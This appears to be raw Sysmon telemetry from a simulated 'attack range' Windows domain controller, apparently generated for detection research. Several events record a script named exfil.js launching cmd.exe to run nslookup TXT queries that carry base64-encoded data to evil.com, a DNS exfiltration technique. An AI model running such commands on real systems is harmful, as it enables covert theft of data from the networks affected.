2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.636{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltngg.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.605{2E1864BB-17CA-629A-B041-000000005F02}24285104C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-B141-000000005F02}5112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.605{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.589{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.018{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-53018-false127.0.0.1-53domain 10341000x8000000000000000203531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.589{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B141-000000005F02}5112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.589{2E1864BB-17CA-629A-AF41-000000005F02}72085108C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-B141-000000005F02}5112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.601{2E1864BB-17CA-629A-B141-000000005F02}5112C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-AF41-000000005F02}7208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltngg.tmp 2>&1 354300x8000000000000000203528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.018{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53018- 354300x8000000000000000203527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.018{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-53018-false127.0.0.1-53domain 354300x8000000000000000203526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.016{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-53017-false127.0.0.1-53domain 354300x8000000000000000203525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.016{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53017- 354300x8000000000000000203524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.016{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-53017-false127.0.0.1-53domain 354300x8000000000000000203523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.015{00000000-0000-0000-0000-000000000000}5060<unknown process>-udpfalsefalse127.0.0.1-53016-false127.0.0.1-53domain 354300x8000000000000000203522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.015{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53016- 354300x8000000000000000203521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.015{00000000-0000-0000-0000-000000000000}5060<unknown process>-udptruefalse127.0.0.1-53016-false127.0.0.1-53domain 354300x8000000000000000203520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{00000000-0000-0000-0000-000000000000}6520<unknown process>-udpfalsefalse127.0.0.1-53015-false127.0.0.1-53domain 354300x8000000000000000203519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53015- 354300x8000000000000000203518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{00000000-0000-0000-0000-000000000000}6520<unknown process>-udptruefalse127.0.0.1-53015-false127.0.0.1-53domain 354300x8000000000000000203517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{00000000-0000-0000-0000-000000000000}6520<unknown process>-udpfalsefalse127.0.0.1-53014-false127.0.0.1-53domain 354300x8000000000000000203516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53014- 354300x8000000000000000203515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{00000000-0000-0000-0000-000000000000}6520<unknown process>-udptruefalse127.0.0.1-53014-false127.0.0.1-53domain 354300x8000000000000000203514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{00000000-0000-0000-0000-000000000000}6520<unknown process>-udpfalsefalse127.0.0.1-53013-false127.0.0.1-53domain 354300x8000000000000000203513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.901{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53013- 354300x8000000000000000203512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.900{00000000-0000-0000-0000-000000000000}6520<unknown process>-udptruefalse127.0.0.1-53013-false127.0.0.1-53domain 354300x8000000000000000203511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.814{00000000-0000-0000-0000-000000000000}2616<unknown process>-udpfalsefalse127.0.0.1-53012-false127.0.0.1-53domain 354300x8000000000000000203510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.814{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53012- 354300x8000000000000000203509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.814{00000000-0000-0000-0000-000000000000}2616<unknown process>-udptruefalse127.0.0.1-53012-false127.0.0.1-53domain 354300x8000000000000000203508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.814{00000000-0000-0000-0000-000000000000}2616<unknown process>-udpfalsefalse127.0.0.1-53011-false127.0.0.1-53domain 354300x8000000000000000203507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.814{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53011- 354300x8000000000000000203506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.813{00000000-0000-0000-0000-000000000000}2616<unknown process>-udptruefalse127.0.0.1-53011-false127.0.0.1-53domain 354300x8000000000000000203505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.813{00000000-0000-0000-0000-000000000000}2616<unknown process>-udpfalsefalse127.0.0.1-53010-false127.0.0.1-53domain 354300x8000000000000000203504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.813{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53010- 354300x8000000000000000203503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.813{00000000-0000-0000-0000-000000000000}2616<unknown process>-udptruefalse127.0.0.1-53010-false127.0.0.1-53domain 354300x8000000000000000203502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.397{00000000-0000-0000-0000-000000000000}2556<unknown process>-udpfalsefalse127.0.0.1-53003-false127.0.0.1-53domain 354300x8000000000000000203501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.396{00000000-0000-0000-0000-000000000000}2556<unknown process>-udptruefalse127.0.0.1-53003-false127.0.0.1-53domain 354300x8000000000000000203500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{00000000-0000-0000-0000-000000000000}7764<unknown process>-udpfalsefalse127.0.0.1-53002-false127.0.0.1-53domain 354300x8000000000000000203499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{00000000-0000-0000-0000-000000000000}7764<unknown process>-udptruefalse127.0.0.1-53002-false127.0.0.1-53domain 354300x8000000000000000203498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{00000000-0000-0000-0000-000000000000}7764<unknown process>-udpfalsefalse127.0.0.1-53001-false127.0.0.1-53domain 354300x8000000000000000203497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{00000000-0000-0000-0000-000000000000}7764<unknown process>-udptruefalse127.0.0.1-53001-false127.0.0.1-53domain 354300x8000000000000000203496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.274{00000000-0000-0000-0000-000000000000}7764<unknown process>-udpfalsefalse127.0.0.1-53000-false127.0.0.1-53domain 354300x8000000000000000203495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.204{00000000-0000-0000-0000-000000000000}7868<unknown process>-udpfalsefalse127.0.0.1-52998-false127.0.0.1-53domain 354300x8000000000000000203494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.135{00000000-0000-0000-0000-000000000000}1716<unknown process>-udpfalsefalse127.0.0.1-52996-false127.0.0.1-53domain 10341000x8000000000000000203493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.558{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B041-000000005F02}2428C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.558{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-B041-000000005F02}2428C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.558{2E1864BB-17CA-629A-B041-000000005F02}24285104C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-AF41-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.535{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-B041-000000005F02}2428C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-AF41-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-17A1-629A-783D-000000005F02}55525184C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-AF41-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.525{2E1864BB-17CA-629A-AF41-000000005F02}7208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltngg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.520{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlclfji.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 